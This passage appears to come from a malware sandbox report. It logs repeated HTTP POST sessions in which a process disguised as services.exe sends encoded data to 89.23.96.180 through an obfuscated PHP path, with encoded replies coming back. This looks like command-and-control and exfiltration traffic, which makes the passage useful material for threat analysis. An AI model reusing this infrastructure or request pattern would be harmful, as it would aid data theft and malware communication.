                                                              Data Ascii: XTCW]XW_U^UZT]PWWR\_RTQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY -W$R1>5T).9 _0?#.^)#/%X1"?4 ?[$*5!_.#Q,>
                                                              Dec 21, 2024 10:48:22.714060068 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:22.945913076 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.54989189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:23.182667017 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:23.534007072 CET2536OUTData Raw: 58 5e 43 52 58 5c 57 52 55 5e 55 5a 54 52 50 5c 57 5a 5c 5f 52 57 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^CRX\WRU^UZTRP\WZ\_RWQV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D-0S&Q*%,?0_$<#9Q4!X12U+48+<_>!_.#Q,
                                                              Dec 21, 2024 10:48:24.558446884 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:24.794193983 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:24 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.54989789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:25.063445091 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:25.409174919 CET2536OUTData Raw: 58 55 46 53 5d 57 57 53 55 5e 55 5a 54 5d 50 54 57 59 5c 5d 52 5f 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XUFS]WWSU^UZT]PTWY\]R_Q^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,!2>!&.?0%<#-;9",=&T6T?;\?[?=!_.#Q,>
                                                              Dec 21, 2024 10:48:26.442559958 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:26.678473949 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.54990389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:26.916299105 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:27.268264055 CET2536OUTData Raw: 58 54 43 51 58 59 52 57 55 5e 55 5a 54 5a 50 54 57 5f 5c 5e 52 51 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCQXYRWU^UZTZPTW_\^RQQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.!<V2>"?!)Z.?;%,;.+67?%T)($< Z*5!_.#Q,"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.54990589.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:27.951780081 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:28.299559116 CET2112OUTData Raw: 58 52 43 5e 58 5c 57 57 55 5e 55 5a 54 5c 50 56 57 5d 5c 54 52 5e 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRC^X\WWU^UZT\PVW]\TR^QZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :W T2[6*">.?#'9! <%%"&Q?$ <[8Z*!_.#Q,
                                                              Dec 21, 2024 10:48:29.331841946 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:29.566260099 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1c 34 05 3e 0a 2b 3a 3f 12 3d 01 2a 55 2a 00 3d 07 2e 22 01 17 22 05 22 13 3e 3d 2c 01 30 00 3b 11 21 5c 2e 04 35 2f 2f 58 3e 1b 2e 58 01 1e 21 06 20 30 21 54 30 01 23 11 3d 27 26 5b 2b 2d 3e 5c 24 2c 2c 0f 25 2a 23 06 3c 39 38 1d 25 5b 22 1f 2c 06 27 5e 29 2e 30 1c 33 36 2b 51 03 1e 26 59 26 2f 3c 0b 25 0d 25 5a 32 10 08 06 23 3d 37 1c 29 38 30 09 20 2b 26 5b 38 07 23 04 2b 2d 3d 02 2b 3b 3a 10 24 02 06 0d 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9894>+:?=*U*=.""">=,0;!\.5//X>.X! 0!T0#='&[+->\$,,%*#<98%[",'^).036+Q&Y&/<%%Z2#=7)80 +&[8#+-=+;:$2>#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.54990689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:28.077169895 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:28.424555063 CET2536OUTData Raw: 58 53 46 55 5d 56 52 54 55 5e 55 5a 54 59 50 57 57 53 5c 59 52 5e 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSFU]VRTU^UZTYPWWS\YR^QV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ."<V&[%Q>!9/$/'.(5P Y=Z2".<+?+5!_.#Q,.
                                                              Dec 21, 2024 10:48:29.454899073 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:29.689913034 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.54991189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:29.931682110 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:30.284105062 CET2536OUTData Raw: 58 57 46 54 58 59 57 51 55 5e 55 5a 54 58 50 50 57 53 5c 55 52 53 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XWFTXYWQU^UZTXPPWS\URSQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D:S%==),?,_'Y8T9;54Y22W<?+-,Z)!_.#Q,*
                                                              Dec 21, 2024 10:48:31.308461905 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:31.542237043 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:31 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.54991789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:31.778604031 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:32.127955914 CET2536OUTData Raw: 5d 52 43 57 5d 5e 57 55 55 5e 55 5a 54 5f 50 52 57 5e 5c 5a 52 51 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RCW]^WUU^UZT_PRW^\ZRQQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C.102>)V=1*.Y#3#.;:75Y11*U+7 ?[+>!_.#Q,6
                                                              Dec 21, 2024 10:48:33.167773008 CET225INHTTP/1.1 100 Continue
                                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 32 31 20 44 65 63 20 32 30 32 34 20 30 39 3a 34 38 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Dec 2024 09:48:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.54992389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:33.403426886 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:33.752819061 CET2536OUTData Raw: 58 56 46 50 5d 5b 57 51 55 5e 55 5a 54 5c 50 56 57 59 5c 5e 52 55 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVFP][WQU^UZT\PVWY\^RUQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .2;1==P>1-\9<$$Y0-)#)1T-?$(?='+5!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.54992689.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:34.701699972 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:35.049635887 CET2112OUTData Raw: 5d 56 43 50 5d 5b 57 52 55 5e 55 5a 54 5e 50 5d 57 5b 5c 5b 52 57 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCP][WRU^UZT^P]W[\[RWQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,!82&>!"9,,''.89S",!Z&T"+?>- Z>!_.#Q,2
                                                              Dec 21, 2024 10:48:36.078263998 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:36.314208984 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 57 34 02 3d 55 3f 14 28 01 29 3c 35 0c 2a 00 0b 01 2e 32 28 03 22 12 3a 13 3e 03 2c 06 26 3e 01 5d 23 3a 25 11 20 3f 37 58 3e 31 2e 58 01 1e 21 44 20 0a 2a 0a 24 3f 33 1e 3e 37 08 5a 3c 2d 31 00 33 06 2f 1b 32 03 20 1b 3d 39 2f 0e 26 3d 29 05 38 2f 01 5b 28 3e 06 13 24 36 2b 51 03 1e 26 5d 26 3c 2f 55 25 0d 21 5a 25 10 2d 16 20 3d 24 0e 29 16 27 1a 34 05 0b 05 2d 29 38 5c 3f 3e 3d 03 2a 06 03 06 24 3c 27 19 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989W4=U?()<5*.2(":>,&>]#:% ?7X>1.X!D *$?3>7Z<-13/2 =9/&=)8/[(>$6+Q&]&</U%!Z%- =$)'4-)8\?>=*$<'1.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.54992789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:34.822994947 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:35.174597025 CET2536OUTData Raw: 5d 54 43 5e 5d 5b 52 53 55 5e 55 5a 54 5a 50 57 57 59 5c 5c 52 54 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]TC^][RSU^UZTZPWWY\\RTQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ."?2?"!^-,<'/,;!#=2"U(?.(X=5!_.#Q,"
                                                              Dec 21, 2024 10:48:36.199074984 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:36.438060045 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.54993289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:36.681042910 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:37.033935070 CET2536OUTData Raw: 58 56 43 57 58 5b 57 56 55 5e 55 5a 54 5a 50 5c 57 5f 5c 5f 52 51 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCWX[WVU^UZTZP\W_\_RQQV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:$-%P>5^9?<$#.^5#&6U(#?8>%!_.#Q,"
                                                              Dec 21, 2024 10:48:38.063987017 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:38.298237085 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.54993789.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:38.540770054 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:38.893332005 CET2532OUTData Raw: 5d 51 43 55 58 59 57 5f 55 5e 55 5a 54 5b 50 57 57 5c 5c 5d 52 55 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QCUXYW_U^UZT[PWW\\]RUQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.1+1=V=2*-<X3<0V,8W#92T? <)%!_.#Q,.
                                                              Dec 21, 2024 10:48:39.926347017 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:40.158488989 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:39 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.54994389.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
